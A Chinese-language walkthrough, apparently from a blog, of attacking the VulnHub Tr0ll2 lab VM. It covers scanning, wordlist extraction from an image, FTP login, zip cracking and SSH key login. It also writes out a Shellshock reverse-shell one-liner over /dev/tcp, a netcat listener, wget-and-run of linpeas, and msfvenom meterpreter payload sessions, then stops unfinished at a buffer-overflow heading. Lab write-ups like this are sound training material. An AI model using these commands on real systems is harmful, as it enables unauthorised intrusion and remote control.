vulnhub-troll2...
forg12
  2022-08-09 15:13:13 2022-08-09 15:13      905 字  

概要

信息收集

主机发现

l
1
2
3
4
5
6
7
8
nmap -sP 192.168.2.0/24                                                  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-15 15:11 CST
Nmap scan report for 192.168.2.1
Host is up (0.0029s latency).

Nmap scan report for 192.168.2.169
Host is up (0.10s latency).

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
nmap -p- 192.168.2.169                                                   
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 192.168.2.169
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds

服务探针

目录遍历

1
dirsearch -u http://192.168.2.169/ -x 403

image-20220815151852333

Robots.txt

image-20220815151956911

1
dirsearch -u http://192.168.2.169/ -x 403 -w /home/kali/hk/troll2/url.txt

image-20220815153638680

1
2
3
4
5
[15:35:38] 301 -  313B  - /noob  ->  http://192.168.2.169/noob/             
[15:35:38] 301 -  320B  - /keep_trying  ->  http://192.168.2.169/keep_trying/
[15:35:38] 301 -  322B  - /ok_this_is_it  ->  http://192.168.2.169/ok_this_is_it/
[15:35:38] 301 -  320B  - /dont_bother  ->  http://192.168.2.169/dont_bother/

​ 四个路径下都是这张图片,查看网页源码,发现图片名为cat the troll.jpg

image-20220815153945929

image-20220815153954586

1
2
wget http://192.168.2.169/noob/cat_the_troll.jpg
strings cat_the_troll.jpg

​ 图片下载下来没看到有用信息,在想是不是其他几个图片中有信息,于是挨个下载下来。最终在第四个路径下的图片中找到了有用的信息。

image-20220815155243525

/y0ur_self

image-20220815155403742

image-20220815155427097

​ 字符被base64编码了,下载下来通过解码生成密码本。

1
2
cat answer.txt | base64 -d > dic.txt
cat dic.txt

image-20220815160601934

ftp登录

​ 这里并没有地方去使用这个字典,回过头来登录一下ftp,这里提示来到的是Tr0ll FTP,尝试使用Tr0ll/Tr0ll进行登录,成功,如果这里未成功的话只能尝试爆破ftp或者ssh了。

1
2
3
4
5
6
7
ftp 192.168.2.169
Connected to 192.168.2.169.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (192.168.2.169:kali): Tr0ll
331 Please specify the password.
Password: Tr0ll
230 Login successful.

image-20220815160956868

解压lmao.zip

​ 下载后发现解压需要密码,结合前面生成的字典进行爆破。

1
2
3
4
fcrackzip -u -D -p /home/kali/hk/troll2/dic.txt lmao.zip


PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL

image-20220815161742676

image-20220815161844298

漏洞利用

​ 解压出来是RSA私钥,可以直接通过私钥登录。

image-20220815162021474

image-20220815162318202

image-20220815162943409

​ 反弹shell

1
ssh -i noob noob@192.168.2.169 '() { :;}; bash -i >& /dev/tcp/192.168.2.168/2233 0>&1'

image-20220815163208803

kali监听反弹的shell

1
nc -lvnp 2233

image-20220815163321702

权限提升

Lines.sh

1
2
3
wget http://192.168.2.168:1111/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh

​ 尝试了很多都没成功。

msf提权

1
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.2.172 lport=1122 -f elf >a.elf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.172    yes       The listen address (an interface
                                      may be specified)
   LPORT  1122             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.2.172:1122 
[*] Sending stage (989032 bytes) to 192.168.2.169
[*] Meterpreter session 1 opened (192.168.2.172:1122 -> 192.168.2.169:58803 )

meterpreter > getuid
Server username: noob

image-20220816144425250

​ 通过msf的local_exploit_suggester对比只发现一个似乎可以提权:

exploit/linux/local/su_login,尝试后失败。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/su_login
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/su_login) > show options 

Module options (exploit/linux/local/su_login):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Password to authenticate with
                                        .
   SESSION                    yes       The session to run this modul
                                        e on
   USERNAME  root             yes       Username to authenticate with
                                        .


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface
                                      may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf6 exploit(linux/local/su_login) > set session 1 
session => 1
msf6 exploit(linux/local/su_login) > set lhost 192.168.2.172 
lhost => 192.168.2.172
msf6 exploit(linux/local/su_login) > exploit 

[*] Started reverse TCP handler on 192.168.2.172:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Uploading payload to target
[*] Attempting to login with su
[*] Exploit completed, but no session was created.

image-20220816144351709

缓冲区溢出

???